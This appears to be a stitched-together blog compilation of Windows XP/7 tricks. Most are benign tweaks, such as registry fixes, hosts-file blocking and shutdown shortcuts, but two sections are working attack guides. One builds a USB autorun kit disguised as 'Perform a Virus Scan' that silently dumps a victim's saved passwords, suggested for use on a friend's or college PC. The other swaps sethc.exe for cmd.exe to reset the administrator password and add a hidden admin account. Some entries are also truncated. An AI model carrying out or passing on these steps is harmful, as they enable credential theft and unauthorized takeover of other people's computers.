Converting Win XP SP2 to SP3 with no installation..

Theses days the technology is changing very rapidly and it took no time while we get new patches ans supplement for several software, though these are always in the favor of the end user but sometime a lot of us just don’t want to implement these latest features. Like me, a few days back have bought a new game CD which requires windows SP3 installed to run it but I just don’t want to do so. So should i left it or any alternatives… Yes I have found one… described below

As for most of the programmes they usually look into the info or the registry file locate the software and patches a PC have and by that means their performance decided so here is the trick to fool such programes which requires Windows XP SP3 patch by altering the Windows XP SP2 version info. To do so go to windows run command (Using windows key +R) and then, type regedit to open Registry Editor. So now you have registry editor opened then only browse to the following key

HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\ Control\ Windows

and modify “CSDVersion” from “0×00000200” (SP2) to the Windows XP SP3 value of “0×00000300” and reboot

This is the simple trick which will bypass the information so that any program requiring SP3 (and you only have Sp2 ) would work so now enjoy all the gaming fun as I do don’t forget to subscribe and enter your valuable opinion in the comments section

Double Click opens up a new explorer window fix it using registry

Are you facing up the similar situation while you double click on anyone of your drives and it opens up in a new window. Then the following registry fix might help you to came up with a solution.

Though this problem generally occurs with a virus infection but whatever is the case you need to only modify the registry settings as per the steps given below:

1. Open the run window using WINDOWS + R key and type regedit.exe to open the registry editor.
2. Locate the key : HKEY_CLASSES_ROOT/Directory/Shell

Double click on the default value on right and set it as “none”.
Repeat the procedure for the key HKEY_CLASSES_ROOT/Drive/Shell.

Hope the above solution will work for you if it fails however you can also try the below solution

Open start menu and click Run.
Type regsvr32 /i shell32.dll
Click Ok and if this message shows “DllRegisterServer and DllInstall in shell32.dll succeeded” that means the problem is solved.

How to block websites without using any software

So here is the way how to block any website on your machine without using any software in window XP.
We do this by editing the Hosts file in our machine. Hosts file is file that contains IP address to hosts name mappings. When ever we open any website the host name to IP address mapping takes place. Like if you type www.google.com and hit enter then, first the machine will resolve the google.com to its IP address and after that it makes connection to google using its IP address. This is called name resolution and it is done by DNS(Domain Name Server). But in case of window OS the Hosts file is prefered to do mapping, and if no mapping is availabel in Hosts file then mapping is done by DNS. This means the OS will first look for mapping in Hosts file rather than directly making a DNS query.

So now we edit Hosts file so that mapping takes place according to ourself, what we define.

First of all you need to edit the Hosts file in your machine. First make backup of Hosts file. The Hosts file is situated at :

C:\WINDOWS\system32\drivers\etc

if C:\ is your installation directory.

You will see there will be a file named as Hosts.

Open that file in wordpad.

now type following at end of file, create new line at last:

127.0.0.1 Website name u want to block

Save the file and exit.

for example if I want to block orkut.com then I type following :

127.0.0.1 orkut.com

Don't forget to enter space between 127.0.0.1 and orkut.com in above line.

How it works ??

127.0.0.1 is a loopback address. This address is used to check status of TCP/IP in a machine. This is the address that is used to connect to your own machine. For eg:

Open CMD and type the following & hit enter:

ping 127.0.0.1

you will get 100% success, because you are pinging your own machine. If you don't get success then it means there is problem with your TCP/IP settings or your OS have some problems.

Now in above example we are telling to Hosts file that, the IP address of orkut.com is 127.0.0.1 ,

so now when you type orkut.com in browser, your browser will ask Hosts file about IP address and as we have mapped orkut.com's IP to 127.0.0.1 so browser will redirect you to 127.0.0.1.

Thus the website will no open. ;-)

This trick can be used in other way too. Suppose if u try to open yahoo.com , but google.com opens..!!! if u want this to happen then u can try this.

put this line in hosts file as explained above:

74.125.43.104 www.yahoo.com

when u try to access yahoo.com you will be redirected to google.com ;-)

This works as same as I have described above.

My Computer takes a long time to load the desktop

Problem:

When I turn on my computer and log in, my computer takes a long time to load the desktop and system tray icons.How do i get rid of it? And fix the the desktop problem?

Solution:

Your windows takes long time to load because of so many reasons like Virus,Damaged,Registry, Fragmented Hard Disk, too many startup items, less memory space.I have already discussed in detail about these things in 5 Reasons that slows down your computer performance post.In this post I am going to show to easy fix a slower PC.

• Removing Unwanted startup Items.
• Fixing HDD Errors.

Now lets see these things in detail.

1. Remove Unwanted Startup Items

• Goto Start-->Run.
• Type msconfig and hit Enter.
• Navigate to Startup tab.

• Keep Antivirus,Instant messenger, and other important applications to load insystem tray.
• Remove unwanted application.It will pull down your PC performance.

2. Fixing Hard Disk Errors

Hard disk error occurs mainly due to improper shutdown.Its also one of the main reason which makes windows to take long time to load.

• Goto Start --> Run.
• Type CMD and hit enter.
• Type chkdsk and hit enter.

• It Check disk command checks error in HDD and fixes it.
• Now fix errors in other drives. D,E,F,G,H,....
• Type CHKDSK /F for drives other than C and fix HDD error.

Keep ur Computer Safe Disable CD/DVD or USB Autorun in Win

When ever you plug a usb device to the system or insert a cd/dvd disk, The windows Autorun Run utility runs and displays certain options like open files to view, Play, Do nothing etc.
 Although this a good utility provided by windows xp operating system, It is sometimes very dangerous too. When A virus infected Usb drive or Cd is plugged into the system, the virus gets a chance to attack you Operating system, by running automatically when you plug your device in. So, for this safety purpose, we need to Disable this Autorun feature in windows XP.
Follow the below steps and ensure your systems safety.

1) Click Start –> Run and type  GPEDIT.MSC  –  This opens Group Policy editor window.
2) On the left side –> expand  Computer Configuration–> Administrative Templates–> System.
3)  Locate the entry for Turn autoplay off on the right side.
4) Double click it and select “Enabled”

PasswordFox: PasswordFox is a small password recovery toolthat allows you to view the user names and passwords stored by Mozilla FirefoxWeb browser. By default, PasswordFox displays the passwords stored in yourcurrent profile, but you can easily select to watch the passwords of any otherFirefox profile. For each password entry, the following information isdisplayed: Record Index, Web Site, User Name, Password, User Name Field,Password Field, and the Signons filename.

Here is a step by step procedure to create the passwordhacking toolkit.

NOTE: You must temporarily disable your Anti-Virus beforefollowing these steps.

1. Download all the 5 tools, extract them and copy only theexecutables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe,pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

save the Notepad as autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text ontoit.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad as launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack thepasswords. You can use this pendrive on your friend’s PC  or on your college computer. Just followthese steps

1. Insert the pendrive and the autorun window will pop-up.(This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform aVirus Scan).

3. Now all the password hacking tools will silently getexecuted in the background (This process takes hardly a few seconds). Thepasswords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwordsin the .TXT files.

This hack works on Windows 2000, XP and Vista.

Here is a small trick to hide text inside your windows default text editor i.e Notepad usingcommand prompt,  but this trick works only on NTFS file system.

Steps to hide text in a Notepad
1. Open your command prompt Start-->Run and Type cmd
2. Type cd.. to move to C:\> drive or Type cd desktop to move to your desktop.



3. Type the below code in your command prompt
notepad filename.txt:hidden
4. Write some data and save(Ctrl+S) the file.
5. Browse to the file location and Open filename.txt you cannot see any data in the file.
6. To retrieve the hidden data open command prompt and type the same command.

Here is a small step by step guide on disabling UAC in Windows 7 / Vista.

1. Go to start, type regedit.exe in searchbox and press enter.
2. Navigate to the following entry in Registry Editor.
   HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Policies System
3. Now look for EnableLUA in right side pane. If the key is not there then create new DWORD with same name. Double click on the key and change its value to ’0′.
   
4. Press OK, restart your computer and done.

How much time is passed... 
Well it happens always , we sit on computer and after sometime when we look at the clock we see that Oh, my god !!!!! so much time has passed. but we don't know exactly how much. So, here is a very small tool which you will create by yourself .

Just copy the below lines in notepad:

@systeminfo | @find "System Up Time:"
@echo.
@pause


Now save this file with the name uptime.bat on your desktop.

Now whenever you want to check how much time has passed after you last started your computer , just double click on the file uptime.bat and you will get the exact time for how long your computer is up. 

Make your PC talk

Open a text file in notepad and write:

Save the file with a (*.vbs) extension, it will create a VBScript File.

Remove Recycle Bin Icon from desktop

Navagate to USER CONFIGURATION &ADMINISTRATIVE TEMPLATES >Click on DESKTOP,

Concept
Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.
Prerequisites
Guest account with write access to system 32.
Method 1 (Change Admin Password)
Here is how to do that -
1.Go to C:/windows/system32
 
2.Copy cmd.exe and paste it on desktop
 
3.Rename cmd.exe to sethc.exe
 
4.Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
 5.Now Log out from your guest account and at the user select window,press shift key 5 times.
 
6.nstead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.
7.Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press 
enter.
 
8.You will see “ The command completed successfully” and then exit the command prompt and login into 
administrator with your new password.
 
9.Congrats You have hacked Admin from guest account.


Method 2 (Access admin without changing password)
Also, you can further create a new user at the command prompt by typing “NET USER Hack-Genius /ADD” where “Hack-Genius” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -
Go to registry editor and navigate to this key

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]

Here create a new “DWORD value”, write its name as the “Hack-Genius” (the username that you entered in the previous step),now you can live with your admin account forever.




Note:For the ones that are having problems with step one: What I would do because you do not have write access to the directory you can use a live version of Linux. Copy the cmd.exe to a flash drive. Boot into Linux and copy the cmd.exe to the file that needs to be replaced. In Linux you can bypass those read/write permissions

Shutdown, Restart, and Logoff Icons on Desktop

You can have shortcuts on the Desktop for shutdown, restart, logoff, standby etc.

Right-click on the Desktop and create a new shortcut by selecting New > Shortcut.

Then in the Type the location of the item box, entershutdown.exe -s -t 00

where 00 is the delay in seconds (you can increase it). You will then be asked to select a name (call it “Shutdown”, for example).

After creating the shortcut, you can change the icon assigned to it by right-clicking on the shortcut and selecting Properties. The window that comes up next has a Change Iconoption.

For a Restart shortcut, use shutdown.exe -r -t 00

For logoff shortcut, type shutdown -l -t 00

For Fast User Switching shortcut, use Rundll32.exe User32.dll, LockWorkStation

For Standby/Hibernation shortcut use Rundll32.exe PowrProf.dll, SetSuspendState
